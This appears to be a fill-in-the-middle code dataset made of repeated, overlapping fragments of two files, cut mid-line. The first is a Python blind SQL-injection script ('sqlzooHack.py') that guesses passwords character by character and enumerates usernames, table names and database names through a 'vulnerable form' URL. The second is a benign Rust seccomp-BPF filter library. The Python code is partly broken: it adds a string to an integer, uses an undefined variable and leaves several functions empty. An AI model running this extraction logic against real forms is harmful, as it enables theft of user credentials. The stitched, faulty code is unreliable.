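    cleaned = [[ch for ch in lst if ch not in drop_wildcards] or [""] for lst in lstNested]
    return ["".join(chars) for chars in itertools.product(*cleaned)]
# Example: expandCandidates([["a"], ["b", "c"], ["d"]]) -> ["abd", "acd"]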
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
|
identifier_body
|
sqlzooHack.py
|
the charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and its index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the characters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # iterate the wildcard characters; wildCards is only the on/off flag
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
return charList
def makeDatabaseList(url, caseSensitive = False, wildCards = True):
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in database names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # iterate the wildcard characters; wildCards is only the on/off flag
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
|
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contains characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
|
conditional_block
|
sqlzooHack.py
|
otherwise, if no characters match, that character will be skipped, and its index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of CharList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a place holder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the characters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # iterate the wildcard characters; wildCards is only the on/off flag
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
return charList
def makeDatabaseList(url, caseSensitive = False, wildCards = True):
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # the module-level list of wildcard characters
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def tableName(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contains characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0
|
prints i iff there is no character in charList that matches at position i. also raises type and value error after printing i -- printing is handled by findChar
password: string
correct password or, if len(password) = n, first n characters of password
if no characters match and wildcards are in the charList (wildCards is True), _ will be substituted in since it matches every single character.
|
random_line_split
|
|
sqlzooHack.py
|
charList (wildCards is True), _ will be substituted in since it matches every single character.
otherwise, if no characters match, that character will be skipped, and its index is printed (e.g. Missing: 6)
Raises:
TypeError: exception
raised with ValueErrors when findChar returns i instead of an element of charList
ValueError: exception
raised when no character in charList is correct.
https://stackoverflow.com/questions/2052390/manually-raising-throwing-an-exception-in-python
Note: not working as hoped. Perhaps I need to change the other functions to always return a str? Maybe a placeholder string like _ for now?
"""
# dikt = {}
password = ""
for i in range(0, n):
if(testPassword(password, username, url)):
return password #password is found!
# https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python
ch = findChar(username, url, charList, i)
# if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string
# use try except instead of if(isinstance(ch, int)):
# https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not
try:
password += ch
except TypeError:
# print(i)
password += str(ch) #should be blank
# raise ValueError("index i has no matching character")
return password #only reached if password is too long for the given n
def findChar(username, url, charList, i):
"""helper function for checkPass
returns the first element of charList found that works for the password at index i
if it fails to find a character at i, prints i and returns an empty string instead of returning i.
"""
for ch in charList:
if(checkPasswordCharacter(ch, username, url, index = i)):
return ch
#only runs if no ch in charList match:
# return i #oof, there's no match if i is out of bounds, e.g. len(password) < i
print("Missing: " + i) #so I know when it's not a match
return "" #return an empty string instead
# Note to self: should not return an _ because it'll match an _ if wildCards are true (default).
# If wildCards is false, this will just skip characters that don't match anything!
"""
Strategy:
if findChar returns i - meaning checkPass will print i then raise a type and a value error -
then perhaps check all unicode characters for the password at index i and add the one that works to the characters checked and rerun the script
"""
def makeTableList(url, caseSensitive = False, wildCards = True):
""" List of characters in table names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in table names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # the module-level list of wildcard characters, as used in userNameCharacters
# ch = str(ch)
if(characterInTableName(ch, url)):
charList.append(ch)
return charList
def makeDatabaseList(url, caseSensitive = False, wildCards = True):
""" List of characters in database names
Args:
url: String
form url
caseSensitive: Boolean
default False
true if case sensitivity matters
wildCards: Boolean
default True
true if wildcards should be placed where no other characters match
Returns:
lst: List
list of characters in database names
"""
charList = []
for ch in lower:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in numbers:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in special:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
for ch in other:
ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(caseSensitive):
for ch in upper:
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
if(wildCards):
for ch in wildcards: # the module-level list of wildcard characters
# ch = str(ch)
if(characterInDatabaseName(ch, url)):
charList.append(ch)
return charList
def makeTableNamesList(n, ):
""" List of table names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n table names
"""
def
|
(lst, ):
name = ""
for i in range(0, n):
for ch in lst:
if(characterInTableName(ch, url, i)):
name += ch
else:
name += "" #should only be reached if wildcards are false
return name
def makeDatabaseNamesList(n, ):
""" List of database names
Args:
n: integer
max number of table names to return
Returns:
lst: list
list of up to n database names
"""
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
"""makeList generalized to use the boolean function f.
Args:
argsf: list
sole list argument of the function f.
Returns:
lst: list of valid characters as determined by the boolean function f
"""
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
""" returns list of characters that appear in any username
"""
"""
sqlzoo characters
['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
"""
lst = []
for ch in special:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in lower:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in numbers:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
for ch in other:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(caseSensitive):
for ch in upper:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
lst.append(ch)
if(wildCards):
for ch in wildcards:
lst.append(ch) #it'll match if there's users
return lst
def userLists(n, tableName, url, characterList):
"""
Assumption: usernames are unique.
Args:
n: integer
max password length
tableName: string
name of table with usernames
url: string
url of vulnerable form
characterList:
list of characters in one or more usernames
Returns:
lstNested: list of lists
returns a list of up to n lists, each sublist i contains characters
from characterList that match at least one username at index i in the
username strings
(e.g. lst = [[a], [b,c], [d]] could correspond to a, ab, ac, abd, acd)
Raises:
"""
lstNested = []
for i in range(0, n):
lst = []
for ch in characterList:
if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = i)):
lst.append(ch)
if(len(lst) == 0 or lst[0] == "%"):
break
lstNested.append(lst)
return lstNested
"""
max(len(username)) is 9. So userLists(12, tab) returns a list with 9 lists (0-8)
matching letters, and both wildcards; the 9
|
tableName
|
identifier_name
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn is_empty(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS
|
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h>`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 6],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
/// // Jump to the next instruction if the loaded value is equal to 42.
/// BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 42, 1, 0);
/// ```
pub const fn BPF_JUMP(code: u16, k: u32, jt: u8, jf: u8) -> sock_filter {
sock_filter { code, jt, jf, k }
}
/// Loads the syscall number into `seccomp_data.nr`.
pub const LOAD_SYSCALL_NR: sock_filter = BPF_STMT(BPF_LD + BPF_W + BPF_ABS, SECCOMP_DATA_OFFSET_NR);
/// Returns from the seccomp filter, allowing the syscall to pass through.
#[allow(unused)]
pub const ALLOW: sock_filter = BPF_STMT(BPF_RET + BPF_K, libc::SECCOMP_RET_ALLOW);
/// Returns from the seccomp filter, instructing the kernel to kill the calling
/// thread with `SIGSYS` before executing the syscall.
#[allow(unused)]
pub const DENY: sock_filter = B
|
{
return Err(Errno::EINVAL);
}
|
conditional_block
|
bpf.rs
|
32 = 0x8000_0000;
const __AUDIT_ARCH_LE: u32 = 0x4000_0000;
// These are defined in `/include/uapi/linux/audit.h`.
pub const AUDIT_ARCH_X86: u32 = EM_386 | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_X86_64: u32 = EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_ARM: u32 = EM_ARM | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_AARCH64: u32 = EM_AARCH64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE;
pub const AUDIT_ARCH_MIPS: u32 = EM_MIPS;
pub const AUDIT_ARCH_PPC: u32 = EM_PPC;
pub const AUDIT_ARCH_PPC64: u32 = EM_PPC64 | __AUDIT_ARCH_64BIT;
bitflags::bitflags! {
#[derive(Default)]
struct FilterFlags: u32 {
const TSYNC = 1 << 0;
const LOG = 1 << 1;
const SPEC_ALLOW = 1 << 2;
const NEW_LISTENER = 1 << 3;
const TSYNC_ESRCH = 1 << 4;
}
}
/// Seccomp-BPF program byte code.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct Filter {
// Since the limit is 4096 instructions, we *could* use a static array here
// instead. However, that would require bounds checks each time an
// instruction is appended and complicate the interface with `Result` types
// and error handling logic. It's cleaner to just check the size when the
// program is loaded.
filter: Vec<sock_filter>,
}
impl Filter {
/// Creates a new, empty seccomp program. Note that empty BPF programs are not
/// valid and will fail to load.
pub const fn new() -> Self {
Self { filter: Vec::new() }
}
/// Appends a single instruction to the seccomp-BPF program.
pub fn push(&mut self, instruction: sock_filter) {
self.filter.push(instruction);
}
/// Returns the number of instructions in the BPF program.
pub fn len(&self) -> usize {
self.filter.len()
}
/// Returns true if the program is empty. Empty seccomp filters will result
/// in an error when loaded.
pub fn
|
(&self) -> bool {
self.filter.is_empty()
}
fn install(&self, flags: FilterFlags) -> Result<i32, Errno> {
let len = self.filter.len();
if len == 0 || len > BPF_MAXINSNS {
return Err(Errno::EINVAL);
}
let prog = libc::sock_fprog {
// Note: length is guaranteed to be less than `u16::MAX` because of
// the above check.
len: len as u16,
filter: self.filter.as_ptr() as *mut _,
};
let ptr = &prog as *const libc::sock_fprog;
let value = Errno::result(unsafe {
libc::syscall(
libc::SYS_seccomp,
SECCOMP_SET_MODE_FILTER,
flags.bits(),
ptr,
)
})?;
Ok(value as i32)
}
/// Loads the program via seccomp into the current process.
///
/// Once loaded, the seccomp filter can never be removed. Additional seccomp
/// filters can be loaded, however, and they will chain together and be
/// executed in reverse order.
///
/// NOTE: The maximum size of any single seccomp-bpf filter is 4096
/// instructions. The overall limit is 32768 instructions across all loaded
/// filters.
///
/// See [`seccomp(2)`](https://man7.org/linux/man-pages/man2/seccomp.2.html)
/// for more details.
pub fn load(&self) -> Result<(), Errno> {
self.install(FilterFlags::empty())?;
Ok(())
}
/// This is the same as [`Filter::load`] except that it returns a file
/// descriptor. This is meant to be used with
/// [`seccomp_unotify(2)`](https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html).
pub fn load_and_listen(&self) -> Result<Fd, Errno> {
let fd = self.install(FilterFlags::NEW_LISTENER)?;
Ok(Fd::new(fd))
}
}
impl Extend<sock_filter> for Filter {
fn extend<T: IntoIterator<Item = sock_filter>>(&mut self, iter: T) {
self.filter.extend(iter)
}
}
/// Trait for types that can emit BPF byte code.
pub trait ByteCode {
/// Accumulates BPF instructions into the given filter.
fn into_bpf(self, filter: &mut Filter);
}
impl<F> ByteCode for F
where
F: FnOnce(&mut Filter),
{
fn into_bpf(self, filter: &mut Filter) {
self(filter)
}
}
impl ByteCode for sock_filter {
fn into_bpf(self, filter: &mut Filter) {
filter.push(self)
}
}
/// Returns a seccomp-bpf filter containing the given list of instructions.
///
/// This can be concatenated with other seccomp-BPF programs.
///
/// Note that this is not a true BPF program. Seccomp-bpf is a subset of BPF and
/// so many instructions are not available.
///
/// When executing instructions, the BPF program operates on the syscall
/// information made available as a (read-only) buffer of the following form:
///
/// ```no_compile
/// struct seccomp_data {
/// // The syscall number.
/// nr: u32,
/// // `AUDIT_ARCH_*` value (see `<linux/audit.h>`).
/// arch: u32,
/// // CPU instruction pointer.
/// instruction_pointer: u64,
/// // Up to 6 syscall arguments.
/// args: [u64; 6],
/// }
/// ```
///
/// # Example
///
/// This filter will allow only the specified syscalls.
/// ```
/// let _filter = seccomp_bpf![
/// // Make sure the target process is using the x86-64 syscall ABI.
/// VALIDATE_ARCH(AUDIT_ARCH_X86_64),
/// // Load the current syscall number into `seccomp_data.nr`.
/// LOAD_SYSCALL_NR,
/// // Check if `seccomp_data.nr` matches the given syscalls. If so, then return
/// // from the seccomp filter early, allowing the syscall to continue.
/// SYSCALL(Sysno::open, ALLOW),
/// SYSCALL(Sysno::close, ALLOW),
/// SYSCALL(Sysno::write, ALLOW),
/// SYSCALL(Sysno::read, ALLOW),
/// // Deny all other syscalls by having the kernel kill the current thread with
/// // `SIGSYS`.
/// DENY,
/// ];
/// ```
#[cfg(test)]
macro_rules! seccomp_bpf {
($($inst:expr),+ $(,)?) => {
{
let mut filter = Filter::new();
$(
$inst.into_bpf(&mut filter);
)+
filter
}
};
}
// See: /include/uapi/linux/filter.h
pub const fn BPF_STMT(code: u16, k: u32) -> sock_filter {
sock_filter {
code,
jt: 0,
jf: 0,
k,
}
}
/// A BPF jump instruction.
///
/// # Arguments
///
/// * `code` is the operation code.
/// * `k` is the value operated on for comparisons.
/// * `jt` is the relative offset to jump to if the comparison is true.
/// * `jf` is the relative offset to jump to if the comparison is false.
///
/// # Example
///
/// ```no_compile
